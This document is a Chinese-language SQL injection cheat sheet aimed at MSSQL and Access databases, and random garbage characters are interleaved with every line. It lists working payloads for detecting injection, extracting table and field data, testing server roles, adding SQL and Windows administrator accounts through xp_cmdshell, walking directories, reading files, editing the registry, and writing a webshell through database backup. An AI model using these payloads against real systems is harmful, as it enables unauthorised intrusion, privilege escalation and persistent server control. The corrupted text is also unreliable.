1.判断是否有注入;and 1=1 ;and 1=2 J~#;<e{\"�
2.初步判断是否是mssql ;and user>0 �d��d]/.Z�
Fd0�%ln�ui
3.注入参数是字符'and [查询条件] and ''=' P��*cNh43U
;[fw]P� �n
4.搜索时没过滤参数的'and [查询条件] and '%25'=' ,?L2w���l[
ki8�5!k=Q2
5.判断数据库系统 V0)fZ�S@tf
$m�42:a�mM
;and (select count(*) from sysobjects)>0 mssql s8}@=]��aA
#5V�9o�KM�
;and (select count(*) from msysobjects)>0 access uDEvzk4��2
hZ.�Z3`v70
Q[�nEs�YP�
m�auI�4�2
6.猜数据库 ;and (select Count(*) from [数据库名])>0 k+ze7�4_�"
fMOU�$0]$<
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 R�~Ne�|�V2
9(@��\&>�)
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 fl\ly���`_
�#-bA[eQV
9.(1)猜字段的ascii值(access) TA{�\�PKA)
��g1jTy7g?
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 5�H ue7'LS
8 XU1�/i7N
(2)猜字段的ascii值(mssql) �>Q(3*d �>
3��+XOZh8
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 )b:7-}�d��
�Z��l*X?5u
10.测试权限结构(mssql) �KQ~i<1&j
rb�|U��;)C
[�i]Ub0Dh7
e� d<�n9�R
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- h=:Q�-?n-
9]@�A]p!�
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- m}X`> a�D/
�@7B$Y��y#
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- sQ�
f�Fu��
�~8]N��K&J
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- p>upA)W�]
7��(�5�
4/
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- oZAB�_A)[-
�R00�e�isd
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- ~�m�$Y$,uH
m&?#;J|B�$
;and 1=(select IS_MEMBER('db_owner'));-- 7R�`mf��
�
�S;)�w�.�
�'�#&os`mQ
O<,�\^�[x�
11.添加mssql和系统的帐户 9�<>wIl*T`
mV�y|{O�h
;exec master.dbo.sp_addlogin username;-- �4y+�<� dw
;exec master.dbo.sp_password null,username,password;-- u�H�(�f$�A
Wr( y)D<y}
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- ���w/kt3Lw
}�yz ��(xH
;exec master.dbo.xp_cmdshell 'net user username password `I�3r3Wy�A
hy`�?E6=9+
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- fP.
6HF_p_
�?�W�)A���
;exec master.dbo.xp_cmdshell 'net user username password /add';-- vMm��1Z5S/
|fHV2Y�`:g
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- v+X)Qm�zf~
6#�HK'7ClL
u4��/�k�R�
�{o>j6R�S\
12.(1)遍历目录 aL&�n[�
��
o:_Xv.HRZo
;create table dirs(paths varchar(100), id int) dz�DqZQY�$
BD�jn
�!3�
;insert dirs exec master.dbo.xp_dirtree 'c:\' p�NKhc#-w
�}3OK�C2K~
;and (select top 1 paths from dirs)>0 MZT2�3��[+
�6Q$�{U7%7
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) ;u�>DNG|.�
`�n�Z��)�>
�=Xqc]5�[i
;�oy-#p>N%
(2)遍历目录 ])��nPP�f�
�Y9�&,t\ q
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- rl��#p".4q
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 �B�Btzs^C|
rv|)��n>�m
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 ]�{ntt}3G,
P7{��gf�iB
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 ��Uk6�HQQ
orjj'�+�;X
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 LyAn&h���}
�ZR(�x%ews
,.}]ut/�Tm
njWL �U!��
13.mssql中的存储过程 0�Nn��s�jh
1q,{0s_kp�
xp_regenumvalues 注册表根键, 子键 �l���LF-{�
(aH'h1,G��
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 `0�Oh_��8"
"$2�y�-�|�
xp_regread 根键,子键,键值名 n:{qC{D-qS
!;K�CU�^�9
;exec xp_regread ;,?�KI$��K
5) pj]S!]-
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 �_t^{a]/H�
��s]f6/x/~
xp_regwrite 根键,子键, 值名, 值类型, 值
&�2��{�tF
�
~�H�r}�]
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 ]hFW�73�FV
�HBu�[gh;b
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 LdL/3��99<
Wwr;-Qa}g�
xp_regdeletevalue 根键,子键,值名 �H*$jc\
dC
d'G0�m9u2
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 �6j�C`�8l:
Bg|�5KOnd�
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 ��Aj+2�;]M
Y�07�ZB�'K
'.81zp�ff�
�5'X ]k@m_
14.mssql的backup创建webshell @T�'i/}�nl
P_Gw�-`L5T
use model RT�.D�"WvT
-�UOj>�{�-
create table cmd(str image); �"O%g�Fye�
MP��4z-4Y�
insert into cmd(str) values (''); !�B��OY@$Y
%)0*&a 4��
backup database model to disk='c:\l.asp'; ��Fd[�zDz
j�hb6T� ?}
mj����KS{�
�Yd#/1!A7u
15.mssql内置函数 {l�/-L�Z�.
�2kIa*#VOJ
;and (select @@version)>0 获得Windows的版本号 7Z-O_h3;)@
f]\CD<g3|E
;and user_name()='dbo' 判断当前系统的连接用户是不是sa 2C9V�|�[U,
br":�y�>=,
;and (select user_name())>0 爆当前系统的连接用户 {��;:�/-0s
I�H�c�D*zQ
;and (select db_name())>0 得到当前连接的数据库 �Wb?8j� M
[�Z}�9>~m�
�$D|�e>U
�T<55a6NoK
16.简洁的webshell 4D�L)��rkO
Cc%Lzt�P>�
use model �rU2%d�kTa
K"4>D�aK2P
create table cmd(str image); ck.w
5�|$
� D0%�U�g>
insert into cmd(str) values (''); (K)]��qNH�
Te�<}*q�vD
backup database model to disk='g:\wwwtest\l.asp';
